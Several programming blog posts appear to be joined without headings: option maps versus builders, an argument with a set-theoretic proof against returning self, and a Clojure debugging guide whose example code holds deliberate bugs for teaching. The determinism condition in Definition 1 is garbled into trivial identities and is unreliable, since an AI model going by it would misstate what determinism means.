I like builders and have written APIs that provide builder patterns, but I really prefer option maps where the language makes it possible. Instead of a builder like

Wizard wiz = new WizardBuilder("some string") .withPriority(1) .withMode(SOME_ENUM) .enableFoo() .disableBar() .build();

I prefer writing something like

Wizard wiz = new Wizard("some string", {:priority 1 :mode SOME_ENUM :foo? true :bar? false})

Why?

  1. Option maps are usually shorter in languages with map literals.
  2. Option maps are data structures, not code. They’re easier to store and read from files. You can put them in databases or exchange them across the network. Over and over again I see boilerplate code that sucks in JSON and calls a builder fun for each key. This is silly.
  3. Builders in most languages (perhaps not Rust!) require an explicit freeze/build operation because they’re, well, mutable. Or you let people clobber them whenever, I guess. :-/
  4. Option maps compose better. You can write functions that transform the map, or add default values, etc, and call a downstream function. Composing builders requires yielding the builder back to the caller via a continuation, block, fun, etc.
  5. Option maps are obviously order-independent; builder APIs are explicitly mutating the builder, which means the order of options can matter. This makes composition in builders less reliable.

Why not use option maps everywhere? I suspect it has to do with type systems. Most languages only have unityped maps (e.g. java.util.Map<String, Object>) where any key is allowed, but options usually have fixed names and specific but heterogenous types. The option map above has booleans, integers, and enums, for example.

In languages like Java, it’s impossible to specify type constraints like “This map has a :foo? key which must be a boolean, and has a :mode key that can only be one of these three values”. Using a builder with explicit type signatures for each function lets you statically verify that the caller is using the correct keys and providing values of the appropriate type. [1]

Of course, all this goes out the window when folks start reading config files at runtime, because you can’t statically verify the config file, so type errors will appear at runtime anyway–but you can certainly get some static benefit wherever the configuration is directly embedded in the code.

[1] Know what a typed heterogenous map is in Java? It’s an Object! From this perspective, builders are just really verbose option maps with static types.

So there’s a blog post that advises every method should, when possible, return self. I’d like to suggest you do the opposite: wherever possible, return something other than self.

Mutation is hard

Mutation makes code harder to reason about. Mutable objects make equality comparisons tricky: if you use a mutable object as the key in a hashmap, for instance, then change one of its fields, what happens? Can you access the value by the new string value? By the old one? What about a set? An array? For a fun time, try these in various languages. Try it with mutable primitives, like Strings, if the language makes a distinction. Enjoy the results.

If you call a function with a mutable object as an argument, you have very few guarantees about the new object’s value. It’s up to you to enforce invariants like “certain fields must be read together”.

If you have two threads interacting with mutable objects concurrently, things get weird fast.

Now, nobody’s arguing that mutability is always bad. There are really good reasons to mutate: your program ultimately must change state; must perform IO, to be meaningful. Mutation is usually faster, reduces GC pressure, and can be safe! It just comes with costs! The more of your program deals with pure values, the easier it is to reason about. If you compare two objects now, you know they’ll compare the same later. You can pass arguments to functions without ever having to worry that they’ll be changed out from underneath you. It gets easier to reason about thread safety.

Moreover, you don’t need a fancy type system like Haskell to experience these benefits: even in the unityped default-mutable wonderland of Ruby, having a culture that makes mutation explicit (for instance, gsub vs gsub!), a culture where not clobbering state is the default, can make our jobs a little easier. Remember, we don’t have to categorically prevent bugs; just make them less likely. Every bit helps.

Returning nil, void, or self strongly suggests impurity

Any time you see a method like

public void foo(String X) { ... } function(a, b) { ... return undefined; } def foo(args) ... self end

you should read: “This function probably mutates state!” In an object oriented language, it might mutate the receiver (self or this). It might mutate any of its arguments. It might mutate variables in lexical scope. It might mutate the computing environment, by setting a global variable, or writing to the filesystem, or sending a network packet.

The hand-wavy argument for this is that there is exactly one meaningful pure function for each of these three return types: the constant void function, the constant nil function, and the identity function(s). If you see this signature used over and over, it’s a hint you’re staring at a big ball of mutable state.

Proof

We aim to show there is only one pure function returning void, one pure function returning nil, etc. In general, we wish to show for any value r you might care to return, there exists exactly one pure function which always returns r.

I’m going to try to write this for folks without a proofs background, but I will use some notation:

  • Capital letters, e.g. X, denote sets
  • f(x) is function application
  • a iff b means “a if, and only if, b”
  • | means “such that”
  • ∀ x means “for all x”
  • ∃ x means “there exists an x”
  • x ∈ X means “x is an element of the set X”
  • (x, y) is an ordered pair, like a tuple
  • X x Y is the Cartesian product: all ordered pairs of (x, y) taken from X and Y respectively.

Definitions

I’m going to depart slightly from the usual set-theoretic definitions to simplify the proof and reduce confusion with common CS terms. We’re interested in functions which might:

  • Take a receiver (e.g. this, self)
  • Take arguments
  • Return values
  • Throw exceptions
  • Depend on an environment
  • Mutate their environment

Let’s simplify.

  • A receiver is simply the first argument to a function.
  • Zero or multiple arguments can be represented as an ordered tuple: (), (arg1), (arg1, arg2, arg3, …).
  • Returning multiple return values (as in go) can be modeled by returning tuples.
  • Exceptions can be modeled as a special set of return values, e.g. (“exception”, “something bad!”)
  • In addition to mapping an argument to a return value, the function will map an initial environment e to a (possibly identical) final environment e'. The environment encapsulates IO, global variables, dynamic scope, mutable state, etc.

Now we adapt the usual set-theoretic graph definition of a function to our model:

Definition 1. A function f in an environment set E, from an input set X (the “domain”), to a set of return values Y (the “codomain”), written f: E, X -> Y, is the set of ordered tuples (e, e', x, y) where e and e' ∈ E, x ∈ X, and y ∈ Y, with two constraints:

  1. Completeness. ∀ x ∈ X, e ∈ E: ∃ (e, e', x, y) ∈ f.
  2. Determinism. ∀ (e, e', x, y) ∈ f: e' = e' and y = y if e = e and x = x

Completeness simply means that the function must return a value for all environments and x’s. Determinism just means that the environment and input x uniquely determine the new environment and return value. Nondeterministic functions are modeled by state in the environment.

We write function application in this model as f(e, x) = (e', y). Read: “Calling f on x in environment e returns y and changes the environment to e'.”

Definition 2. A function is pure iff ∀ (e, e', x, y) ∈ f, e = e'; e.g, its initial and final environments are identical.

There can be only one

We wish to show that for any value r, there is only one pure function which always returns r. Assume there exist two distinct pure functions f and g, over the same domain X, returning r. Remember, these functions are pure, so their initial and final environments are the same:

  • ∀ e ∈ E, x ∈ X: f(e, x) -> (e, r)
  • ∀ e ∈ E, x ∈ X: g(e, x) -> (e, r)

But by definition 1, f and g are simply:

  • f = {(e, e, x, r) | e ∈ E, x ∈ X}
  • g = {(e, e, x, r) | e ∈ E, x ∈ X}

… which are identical sets. We obtain a contradiction: f and g cannot be distinct; therefore, in any environment E and over any input set X, there exists only a single function returning r. ∎

You can make the exact same argument for functions that return their first (or nth) argument: they’re just variations on the identity function, one version for each arity:

  • (e, e, (x), x)
  • (e, e, (x, a), x)
  • (e, e, (x, a, b), x)
  • (e, e, (x, a, b, …), x)

Redundancy of functions over different domains

Given two pure single-valued functions over different domains f: E, X1 -> {r} and g: E, X2 -> {r}, let h be the set of all tuples in either f or g: h = f ∪ g.

Since f is pure, ∀ (e, e', x, y) ∈ f, e = e'; and the same for g. Therefore, ∀ (e, e', x, y) ∈ h, e = e' as well: h does not mutate its environment.

Since f has a mapping for all combinations of environments in E and inputs in X1, so does h. And the same goes for g: h has mappings for all combinations of environments in E and inputs in X2. h is therefore complete over E and X1 ∪ X2.

Since f and g always return r, ∀ (e, e', x, y) ∈ h, y = r too. Because h can never have multiple values for y (and because it does not mutate its environment), it is deterministic per definition 1.

Therefore, h is a pure function in E over X1 ∪ X2–and is therefore a pure function over either X1 or X2 alone. You can safely replace any instance of f or g with h: there isn’t really a point to having more than one pure function returning void, nil, etc. in your program, unless you’re doing it for static type safety.

Don’t believe me? Here’s a single Clojure function that can replace any pure function returning its first argument. Works on integers, strings, other functions… whatever types you like.

user=> (def selfie (fn [self & args] self))) #'user/selfie user=> (selfie 3) 3 user=> (selfie "channing" "tatum") "channing"

Returning self suggests impurity

You can write the same function more than one way. Here are two pure functions in Ruby that both return self:

def meow self end def stretch nil ENV["USER"] + " in spaaace" 5.3 / 3 self end

meow is just identity–but so is stretch, and, by our proof above, so is every other pure function returning self. The only difference is that stretch has useless dead code, which any compiler, linter, or human worth their salt will strip out. Writing code like this is probably silly. You can construct weird cases (interfaces, etc) where you want a whole bunch of identity functions, or (constantly nil), etc, but I think those are pretty rare.

What about calling a function then returning self?

def foo enjoy("http://shirtless-channing-tatum.biz") self end

There are only two cases. If enjoy is pure, so is foo, and we can replace the function by

def foo self end

If enjoy is impure (and let’s face it: shirtless Channing Tatum induces side effects in most callers), then foo is also impure, and we’re back to square one: mutation.

Final thoughts

When you see functions that return void, nil, or self, ask “what is this mutating?” If you have a pure function (say, returning the number of explosions in a film) and follow the advice of returning self as much as possible, you are turning a pure function into an impure one. You have to add state and mutability to the system. You should strive to do the opposite: reduce mutation wherever possible.

I assure you, return values are OK.

Writing software can be an exercise in frustration. Useless error messages, difficult-to-reproduce bugs, missing stacktrace information, obscure functions without documentation, and unmaintained libraries all stand in our way. As software engineers, our most useful skill isn’t so much knowing how to solve a problem as knowing how to explore a problem that we haven’t seen before. Experience is important, but even experienced engineers face unfamiliar bugs every day. When a problem doesn’t bear a resemblance to anything we’ve seen before, we fall back on general cognitive strategies to explore–and ultimately solve–the problem.

There’s an excellent book by the mathematician George Polya: How to Solve It, which tries to catalogue how successful mathematicians approach unfamiliar problems. When I catch myself banging my head against a problem for more than a few minutes, I try to back up and consider his principles. Sometimes, just taking the time to slow down and reflect can get me out of a rut.

  1. Understand the problem.
  2. Devise a plan.
  3. Carry out the plan
  4. Look back

Seems easy enough, right? Let’s go a little deeper.

Understanding the problem

Well obviously there’s a problem, right? The program failed to compile, or a test spat out bizarre numbers, or you hit an unexpected exception. But try to dig a little deeper than that. Just having a careful description of the problem can make the solution obvious.

Our audit program detected that users can double-withdraw cash from their accounts.

What does your program do? Chances are your program is large and complex, so try to isolate the problem as much as possible. Find preconditions where the error holds.

The problem occurs after multiple transfers between accounts.

Identify specific lines of code from the stacktrace that are involved, specific data that’s being passed around. Can you find a particular function that’s misbehaving?

The balance transfer function sometimes doesn’t increase or decrease the account values correctly.

What are that function’s inputs and outputs? Are the inputs what you expected? What did you expect the result to be, given those arguments? It’s not enough to know “it doesn’t work”–you need to know exactly what should have happened. Try to find conditions where the function works correctly, so you can map out the boundaries of the problem.

Trying to transfer $100 from A to B works as expected, as does a transfer of $50 from B to A. Running a million random transfers between accounts, sequentially, results in correct balances. The problem only seems to happen in production.

If your function–or functions it calls–uses mutable state, like an agent, atom, or ref, the value of those references matters too. This is why you should avoid mutable state wherever possible: each mutable variable introduces another dimension of possible behaviors for your program. Print out those values when they’re read, and after they’re written, to get a description of what the function is actually doing. I am a huge believer in sprinkling (prn x) throughout one’s code to print how state evolves when the program runs.

Each balance is stored in a separate atom. When two transfers happen at the same time involving the same accounts, the new value of one or both atoms may not reflect the transfer correctly.

Look for invariants: properties that should always be true of a program. Devise a test to look for where those invariants are broken. Consider each individual step of the program: does it preserve all the invariants you need? If it doesn’t, what ensures those invariants are restored correctly?

The total amount of money in the system should be constant–but sometimes changes!

Draw diagrams, and invent a notation to talk about the problem. If you’re accessing fields in a vector, try drawing the vector as a set of boxes, and drawing the fields it accesses, step by step on paper. If you’re manipulating a tree, draw one! Figure out a way to write down the state of the system: in letters, numbers, arrows, graphs, whatever you can dream up.

Transferring $5 from A to B in transaction 1, and $5 from B to A in transaction 2: Transaction | A | B -------------+-----+----- txn1 read | 10 | 10 ; Transaction 1 sees 10, 10 txn1 write A | 5 | 10 ; A and B now out-of-sync txn2 read | 5 | 10 ; Transaction 2 sees 5, 10 txn1 write B | 5 | 15 ; Transaction 1 completes txn2 write A | 10 | 15 ; Transaction 2 writes based on out-of-sync read txn2 write B | 5 | 5 ; Should have been 10, 10!

This doesn’t solve the problem, but helps us explore the problem in depth. Sometimes this makes the solution obvious–other times, we’re just left with a pile of disjoint facts. Even if things look jumbled-up and confusing, don’t despair! Exploring gives the brain the pieces; it’ll link them together over time.

Armed with a detailed description of the problem, we’re much better equipped to solve it.

Devise a plan

Our brains are excellent pattern-matchers, but not that great at tracking abstract logical operations. Try changing your viewpoint: rotating the problem into a representation that’s a little more tractable for your mind. Is there a similar problem you’ve seen in the past? Is this a well-known problem?

Make sure you know how to check the solution. With the problem isolated to a single function, we can write a test case that verifies the account balances are correct. Then we can experiment freely, and have some confidence that we’ve actually found a solution.

Can you solve a related problem? If only concurrent transfers trigger the problem, could we solve the issue by ensuring transactions never take place concurrently–e.g. by wrapping the operation in a lock? Could we solve it by logging all transactions, and replaying the log? Is there a simpler variant of the problem that might be tractable–maybe one that always overcounts, but never undercounts?

Consider your assumptions. We rely on layers of abstraction in writing software–that changing a variable is atomic, that lexical variables don’t change, that adding 1 and 1 always gives 2. Sometimes, parts of the computer fail to guarantee those abstractions hold. The CPU might–very rarely–fail to divide numbers correctly. A library might, for supposedly valid input, spit out a bad result. A numeric algorithm might fail to converge, and spit out wrong numbers. To avoid questioning everything, start in your own code, and work your way down to the assumptions themselves. See if you can devise tests that check the language or library is behaving as you expect.

Can you avoid solving the problem altogether? Is there a library, database, or language feature that does transaction management for us? Is integrating that library worth the reduced complexity in our application?

We’re not mathematicians; we’re engineers. Part theorist, yes, but also part mechanic. Some problems take a more abstract approach, and others are better approached by tapping it with a wrench and checking the service manual. If other people have solved your problem already, using their solution can be much simpler than devising your own.

Can you think of a way to get more diagnostic information? Perhaps we could log more data from the functions that are misbehaving, or find a way to dump and replay transactions from the live program. Some problems disappear when instrumented; these are the hardest to solve, but also the most rewarding.

Combine key phrases in a Google search: the name of the library you’re using, the type of exception thrown, any error codes or log messages. Often you’ll find a StackOverflow result, a mailing list post, or a Github issue that describes your problem. This works well when you know the technical terms for your problem–in our case, that we’re performing a atomic, transactional transfer between two variables. Sometimes, though, you don’t know the established names for your problem, and have to resort to blind queries like “variables out of sync” or “overwritten data”–which are much more difficult.

When you get stuck exploring on your own, try asking for help. Collect your description of the problem, the steps you took, and what you expected the program to do. Include any stacktraces or error messages, log files, and the smallest section of source code required to reproduce the problem. Also include the versions of software used–in Clojure, typically the JVM version (java -version), Clojure version (project.clj), and any other relevant library versions.

If the project has a Github page or public issue tracker, like Jira, you can try filing an issue there. Here’s a particularly well-written issue filed by a user on one of my projects. Note that this user included installation instructions, the command they ran, and the stacktrace it printed. The more specific a description you provide, the easier it is for someone else to understand your problem and help!

Sometimes you need to talk through a problem interactively. For that, I prefer IRC–many projects have a channel on the Freenode IRC network where you can ask basic questions. Remember to be respectful of the channel’s time; there may be hundreds of users present, and they have to sort through everything you write. Paste your problem description into a pastebin like Gist, then mention the link in IRC with a short–say a few sentences–description of the problem. I try asking in a channel devoted to a specific library or program first, then back off to a more general channel, like #clojure. There’s no need to ask “Can I ask a question” first–just jump in.

Since the transactional problem we’ve been exploring seems like a general issue with atoms, I might ask in #clojure

aphyr > Hi! Does anyone know the right way to change multiple atoms at the same time? aphyr > This function and test case (http://gist.github.com/...) seems to double- or under-count when invoked concurrently.

Finally, you can join the project’s email list, and ask your question there. Turnaround times are longer, but you’ll often find a more in-depth response to your question via email. This applies especially if you and the maintainer are in different time zones, or if they’re busy with life. You can also ask specific problems on StackOverflow or other message boards; users there can be incredibly helpful.

Remember, other engineers are taking time away from their work, family, friends, and hobbies to help you. It’s always polite to give them time to answer first–they may have other priorities. A sincere thank-you is always appreciated–as is paying it forward by answering other users' questions on the list or channel!

Dealing with abuse

Sadly, some women, LGBT people, and so on experience harassment on IRC or in other discussion circles. They may be asked inappropriate personal questions, insulted, threatened, assumed to be straight, to be a man, and so on. Sometimes other users will attack questioners for inexperience. Exclusion can be overt (“Read the fucking docs, faggot!”) or more subtle (“Hey dudes, what’s up?”). It only takes one hurtful experience this to sour someone on an entire community.

If this happens to you, place your own well-being first. You are not obligated to fix anyone else’s problems, or to remain in a social context that makes you uncomfortable.

That said, be aware the other people in a channel may not share your culture. English may not be their main language, or they may have said something hurtful without realizing its impact. Explaining how the comment made you feel can jar a well-meaning but unaware person into reconsidering their actions.

Other times, people are just mean–and it only takes one to ruin everybody’s day. When this happens, you can appeal to a moderator. On IRC, moderators are sometimes identified by an @ sign in front of their name; on forums, they may have a special mark on their username or profile. Large projects may have an official policy for reporting abuse on their website or in the channel topic. If there’s no policy, try asking whoever seems in charge for help. Most projects have a primary maintainer or community manager with the power to mute or ban malicious users.

Again, these ways of dealing with abuse are optional. You have no responsibility to provide others with endless patience, and it is not your responsibility to fix a toxic culture. You can always log off and try something else. There are many communities which will welcome and support you–it may just take a few tries to find the right fit.

If you don’t find community, you can build it. Starting your own IRC channel, mailing list, or discussion group with a few friends can be a great way to help each other learn in a supportive environment. And if trolls ever come calling, you’ll be able to ban them personally.

Now, back to problem-solving.

Execute the plan

Sometimes we can make a quick fix in the codebase, test it by hand, and move on. But for more serious problems, we’ll need a more involved process. I always try to get a reproducible test suite–one that runs in a matter of seconds–so that I can continually check my work.

Persist. Many problems require grinding away for some time. Mix blind experimentation with sitting back and planning. Periodically re-evaluate your work–have you made progress? Identified a sub-problem that can be solved independently? Developed a new notation?

If you get stuck, try a new tack. Save your approach as a comment or using git stash, and start fresh. Maybe using a different concurrency primitive is in order, or rephrasing the data structure entirely. Take a reading break and review the documentation for the library you’re trying to use. Read the source code for the functions you’re calling–even if you don’t understand exactly what it does, it might give you clues to how things work under the hood.

Bounce your problem off a friend. Grab a sheet of paper or whiteboard, describe the problem, and work through your thinking with that person. Their understanding of the problem might be totally off-base, but can still give you valuable insight. Maybe they know exactly what the problem is, and can point you to a solution in thirty seconds!

Finally, take a break. Go home. Go for a walk. Lift heavy, run hard, space out, drink with your friends, practice music, read a book. Just before sleep, go over the problem once more in your head; I often wake up with a new algorithm or new questions burning to get out. Your unconscious mind can come up with unexpected insights if given time away from the problem!

Some folks swear by time in the shower, others by hiking, or with pen and paper in a hammock. Find what works for you! The important thing seems to be giving yourself away from struggling with the problem.

Look back

Chances are you’ll know as soon as your solution works. The program compiles, transactions generate the correct amounts, etc. Now’s an important time to solidify your work.

Bolster your tests. You may have made the problem less likely, but not actually solved it. Try a more aggressive, randomized test; one that runs for longer, that generates a broader class of input. Try it on a copy of the production workload before deploying your change.

Identify why the new system works. Pasting something in from StackOverflow may get you through the day, but won’t help you solve similar problems in the future. Try to really understand why the program went wrong, and how the new pieces work together to prevent the problem. Is there a more general underlying problem? Could you generalize your technique to solve a related problem? If you’ll encounter this type of issue frequently, could you build a function or library to help build other solutions?

Document the solution. Write down your description of the problem, and why your changes fix it, as comments in the source code. Use that same description of the solution in your commit message, or attach it as a comment to the resources you used online, so that other people can come to the same understanding.

Debugging Clojure

With these general strategies in mind, I’d like to talk specifically about the debugging Clojure code–especially understanding its stacktraces. Consider this simple program for baking cakes:

(ns scratch.debugging) (defn bake "Bakes a cake for a certain amount of time, returning a cake with a new :tastiness level." [pie temp time] (assoc pie :tastiness (condp (* temp time) < 400 :burned 350 :perfect 300 :soggy)))

And in the REPL

user=> (bake {:flavor :blackberry} 375 10.25) ClassCastException java.lang.Double cannot be cast to clojure.lang.IFn scratch.debugging/bake (debugging.clj:8)

This is not particularly helpful. Let’s print a full stacktrace using pst:

user=> (pst) ClassCastException java.lang.Double cannot be cast to clojure.lang.IFn scratch.debugging/bake (debugging.clj:8) user/eval1223 (form-init4495957503656407289.clj:1) clojure.lang.Compiler.eval (Compiler.java:6619) clojure.lang.Compiler.eval (Compiler.java:6582) clojure.core/eval (core.clj:2852) clojure.main/repl/read-eval-print--6588/fn--6591 (main.clj:259) clojure.main/repl/read-eval-print--6588 (main.clj:259) clojure.main/repl/fn--6597 (main.clj:277) clojure.main/repl (main.clj:277) clojure.tools.nrepl.middleware.interruptible-eval/evaluate/fn--591 (interruptible_eval.clj:56) clojure.core/apply (core.clj:617) clojure.core/with-bindings* (core.clj:1788)

The first line tells us the type of the error: a ClassCastException. Then there’s some explanatory text: we can’t cast a java.lang.Double to a clojure.lang.IFn. The indented lines show the functions that led to the error. The first line is the deepest function, where the error actually occurred: the bake function in the scratch.debugging namespace. In parentheses is the file name (debugging.clj) and line number (8) from the code that caused the error. Each following line shows the function that called the previous line. In the REPL, our code is invoked from a special function compiled by the REPL itself–with an automatically generated name like user/eval1223, and that function is invoked by the Clojure compiler, and the REPL tooling. Once we see something like Compiler.eval at the repl, we can generally skip the rest.

As a general rule, we want to look at the deepest (earliest) point in the stacktrace that we wrote. Sometimes an error will arise from deep within a library or Clojure itself–but it was probably invoked by our code somewhere. We’ll skim down the lines until we find our namespace, and start our investigation at that point.

Our case is simple: bake.clj, on line 8, seems to be the culprit.

(condp (* temp time) <

Now let’s consider the error itself: ClassCastException: java.lang.Double cannot be cast to clojure.lang.IFn. This implies we had a Double and tried to cast it to an IFn–but what does “cast” mean? For that matter, what’s a Double, or an IFn?

A quick google search for java.lang.Double reveals that it’s a class (a Java type) with some basic documentation. “The Double class wraps a value of the primitive type double in an object” is not particularly informative–but the “class hierarchy” at the top of the page shows that a Double is a kind of java.lang.Number. Let’s experiment at the REPL:

user=> (type 4) java.lang.Long user=> (type 4.5) java.lang.Double

Indeed: decimal numbers in Clojure appear to be doubles. One of the expressions in that condp call was probably a decimal. At first we might suspect the literal values 300, 350, or 400–but those are Longs, not Doubles. The only Double we passed in was the time duration 10.25–which appears in condp as (* temp time). That first argument was a Double, but should have been an IFn.

What the heck is an IFn? Its source code has a comment:

IFn provides complete access to invoking any of Clojure’s API’s. You can also access any other library written in Clojure, after adding either its source or compiled form to the classpath.

So IFn has to do with invoking Clojure’s API. Ah–Fn probably stands for function–and this class is chock full of things like invoke(Object arg1, Object arg2). That suggests that IFn is about calling functions. And the I? Google suggests it’s a Java convention for an interface–whatever that is. Remember, we don’t have to understand everything–just enough to get by. There’s plenty to explore later.

Let’s check our hypothesis in the repl:

user=> (instance? clojure.lang.IFn 2.5) false user=> (instance? clojure.lang.IFn conj) true user=> (instance? clojure.lang.IFn (fn [x] (inc x))) true

So Doubles aren’t IFns–but Clojure built-in functions, and anonymous functions, both are. Let’s double-check the docs for condp again:

user=> (doc condp) ------------------------- clojure.core/condp ([pred expr & clauses]) Macro Takes a binary predicate, an expression, and a set of clauses. Each clause can take the form of either: test-expr result-expr test-expr :>> result-fn Note :>> is an ordinary keyword. For each clause, (pred test-expr expr) is evaluated. If it returns logical true, the clause is a match. If a binary clause matches, the result-expr is returned, if a ternary clause matches, its result-fn, which must be a unary function, is called with the result of the predicate as its argument, the result of that call being the return value of condp. A single default expression can follow the clauses, and its value will be returned if no clause matches. If no default expression is provided and no clause matches, an IllegalArgumentException is thrown.clj

That’s a lot to take in! No wonder we got it wrong! We’ll take it slow, and look at the arguments.

(condp (* temp time) <

Our pred was (* temp time) (a Double), and our expr was the comparison function <. For each clause, (pred test-expr expr) is evaluated, so that would expand to something like

((* temp time) 400 <)

Which evaluates to something like

(123.45 400 <)

But this isn’t a valid Lisp program! It starts with a number, not a function. We should have written (< 123.45 400). Our arguments are backwards!

(defn bake "Bakes a cake for a certain amount of time, returning a cake with a new :tastiness level." [pie temp time] (assoc pie :tastiness (condp < (* temp time) 400 :burned 350 :perfect 300 :soggy))) user=> (use 'scratch.debugging :reload) nil user=> (bake {:flavor :chocolate} 375 10.25) {:tastiness :burned, :flavor :chocolate} user=> (bake {:flavor :chocolate} 450 0.8) {:tastiness :perfect, :flavor :chocolate}

Mission accomplished! We read the stacktrace as a path to a part of the program where things went wrong. We identified the deepest part of that path in our code, and looked for a problem there. We discovered that we had reversed the arguments to a function, and after some research and experimentation in the REPL, figured out the right order.

An aside on types: some languages have a stricter type system than Clojure’s, in which the types of variables are explicitly declared in the program’s source code. Those languages can detect type errors–when a variable of one type is used in place of another, incompatible, type–and offer more precise feedback. In Clojure, the compiler does not generally enforce types at compile time, which allows for significant flexibility–but requires more rigorous testing to expose these errors.

Higher order stacktraces

The stacktrace shows us a path through the program, moving downwards through functions. However, that path may not be straightforward. When data is handed off from one part of the program to another, the stacktrace may not show the origin of an error. When functions are handed off from one part of the program to another, the resulting traces can be tricky to interpret indeed.

For instance, say we wanted to make some picture frames out of wood, but didn’t know how much wood to buy. We might sketch out a program like this:

(defn perimeter "Given a rectangle, returns a vector of its edge lengths." [rect] [(:x rect) (:y rect) (:z rect) (:y rect)]) (defn frame "Given a mat width, and a photo rectangle, figure out the size of the frame required by adding the mat width around all edges of the photo." [mat-width rect] (let [margin (* 2 rect)] {:x (+ margin (:x rect)) :y (+ margin (:y rect))})) (def failure-rate "Sometimes the wood is knotty or we screw up a cut. We'll assume we need a spare segment once every 8." 1/8) (defn spares "Given a list of segments, figure out roughly how many of each distinct size will go bad, and emit a sequence of spare segments, assuming we screw up `failure-rate` of them." [segments] (->> segments ; Compute a map of each segment length to the number of ; segments we'll need of that size. frequencies ; Make a list of spares for each segment length, ; based on how often we think we'll screw up. (mapcat (fn [ [segment n]] (repeat (* failure-rate n) segment))))) (def cut-size "How much extra wood do we need for each cut? Let's say a mitred cut for a 1-inch frame needs a full inch." 1) (defn total-wood [mat-width photos] "Given a mat width and a collection of photos, compute the total linear amount of wood we need to buy in order to make frames for each, given a 2-inch mat." (let [segments (->> photos ; Convert photos to frame dimensions (map (partial frame mat-width)) ; Convert frames to segments (mapcat perimeter))] ; Now, take segments (->> segments ; Add the spares (concat (spares segments)) ; Include a cut between each segment (interpose cut-size) ; And sum the whole shebang. (reduce +)))) (->> [{:x 8 :y 10} {:x 10 :y 8} {:x 20 :y 30}] (total-wood 2) (println "total inches:"))

Running this program yields a curious stacktrace. We’ll print the full trace (not the shortened one that comes with pst) for the last exception *e with the .printStackTrace function.

user=> (.printStackTrace *e) java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number, compiling:(scratch/debugging.clj:73:23) at clojure.lang.Compiler.load(Compiler.java:7142) at clojure.lang.RT.loadResourceScript(RT.java:370) at clojure.lang.RT.loadResourceScript(RT.java:361) at clojure.lang.RT.load(RT.java:440) at clojure.lang.RT.load(RT.java:411) ... at java.lang.Thread.run(Thread.java:745) Caused by: java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number at clojure.lang.Numbers.multiply(Numbers.java:146) at clojure.lang.Numbers.multiply(Numbers.java:3659) at scratch.debugging$frame.invoke(debugging.clj:26) at clojure.lang.AFn.applyToHelper(AFn.java:156) at clojure.lang.AFn.applyTo(AFn.java:144) at clojure.core$apply.invoke(core.clj:626) at clojure.core$partial$fn__4228.doInvoke(core.clj:2468) at clojure.lang.RestFn.invoke(RestFn.java:408) at clojure.core$map$fn__4245.invoke(core.clj:2557) at clojure.lang.LazySeq.sval(LazySeq.java:40) at clojure.lang.LazySeq.seq(LazySeq.java:49) at clojure.lang.RT.seq(RT.java:484) at clojure.core$seq.invoke(core.clj:133) at clojure.core$map$fn__4245.invoke(core.clj:2551) at clojure.lang.LazySeq.sval(LazySeq.java:40) at clojure.lang.LazySeq.seq(LazySeq.java:49) at clojure.lang.RT.seq(RT.java:484) at clojure.core$seq.invoke(core.clj:133) at clojure.core$apply.invoke(core.clj:624) at clojure.core$mapcat.doInvoke(core.clj:2586) at clojure.lang.RestFn.invoke(RestFn.java:423) at scratch.debugging$total_wood.invoke(debugging.clj:62) ...

First: this trace has two parts. The top-level error (a CompilerException) appears first, and is followed by the exception that caused the CompilerException: a ClassCastException. This makes the stacktrace read somewhat out of order, since the deepest part of the trace occurs in the first line of the last exception. We read C B A then F E D. This is an old convention in the Java language, and the cause of no end of frustration.

Notice that this representation of the stacktrace is less friendly than (pst). We’re seeing the Java Virtual Machine (JVM)’s internal representation of Clojure functions, which look like clojure.core$partial$fn__4228.doInvoke. This corresponds to the namespace clojure.core, in which there is a function called partial, inside of which is an anonymous function, here named fn__4228. Calling a Clojure function is written, in the JVM, as .invoke or .doInvoke.

So: the root cause was a ClassCastException, and it tells us that Clojure expected a java.lang.Number, but found a PersistentArrayMap. We might guess that PersistentArrayMap is something to do with the map data structure, which we used in this program:

user=> (type {:x 1}) clojure.lang.PersistentArrayMap

And we’d be right. We can also tell, by reading down the stacktrace looking for our scratch.debugging namespace, where the error took place: scratch.debugging$frame, on line 26.

(let [margin (* 2 rect)]

There’s our multiplication operation *, which we might assume expands to clojure.lang.Numbers.multiply. But the path to the error is odd.

(->> photos ; Convert photos to frame dimensions (map (partial frame mat-width))

In total-wood, we call (map (partial frame mat-width) photos) right away, so we’d expect the stacktrace to go from total-wood to map to frame. But this is not what happens. Instead, total-wood invokes something called RestFn–a piece of Clojure plumbing–which in turn calls mapcat.

at clojure.core$mapcat.doInvoke(core.clj:2586) at clojure.lang.RestFn.invoke(RestFn.java:423) at scratch.debugging$total_wood.invoke(debugging.clj:62)

Why doesn’t total-wood call map first? Well it did–but map doesn’t actually apply its function to anything in the photos vector when invoked. Instead, it returns a lazy sequence–one which applies frame only when elements are asked for.

user=> (type (map inc (range 10))) clojure.lang.LazySeq

Inside each LazySeq is a box containing a function. When you ask a LazySeq for its first value, it calls that function to return a new sequence–and that’s when frame gets invoked. What we’re seeing in this stacktrace is the LazySeq internal machinery at work–mapcat asks it for a value, and the LazySeq asks map to generate that value.

at clojure.core$partial$fn__4228.doInvoke(core.clj:2468) at clojure.lang.RestFn.invoke(RestFn.java:408) at clojure.core$map$fn__4245.invoke(core.clj:2557) at clojure.lang.LazySeq.sval(LazySeq.java:40) at clojure.lang.LazySeq.seq(LazySeq.java:49) at clojure.lang.RT.seq(RT.java:484) at clojure.core$seq.invoke(core.clj:133) at clojure.core$map$fn__4245.invoke(core.clj:2551) at clojure.lang.LazySeq.sval(LazySeq.java:40) at clojure.lang.LazySeq.seq(LazySeq.java:49) at clojure.lang.RT.seq(RT.java:484) at clojure.core$seq.invoke(core.clj:133) at clojure.core$apply.invoke(core.clj:624) at clojure.core$mapcat.doInvoke(core.clj:2586) at clojure.lang.RestFn.invoke(RestFn.java:423) at scratch.debugging$total_wood.invoke(debugging.clj:62)

In fact we pass through map’s laziness twice here: a quick peek at (source mapcat) shows that it expands into a map call itself, and then there’s a second map: the one we created in in total-wood. Then an odd thing happens–we hit something called clojure.core$partial$fn__4228.

(map (partial frame mat-width) photos)

The frame function takes two arguments: a mat width and a photo. We wanted a function that takes just one argument: a photo. (partial frame mat-width) took mat-width and generated a new function which takes one arg–call it photo–and calls (frame mad-width photo). That automatically generated function, returned by partial, is what map uses to generate new elements of its sequence on demand.

user=> (partial + 1) #<core$partial$fn__4228 clojure.core$partial$fn__4228@243634f2> user=> ((partial + 1) 4) 5

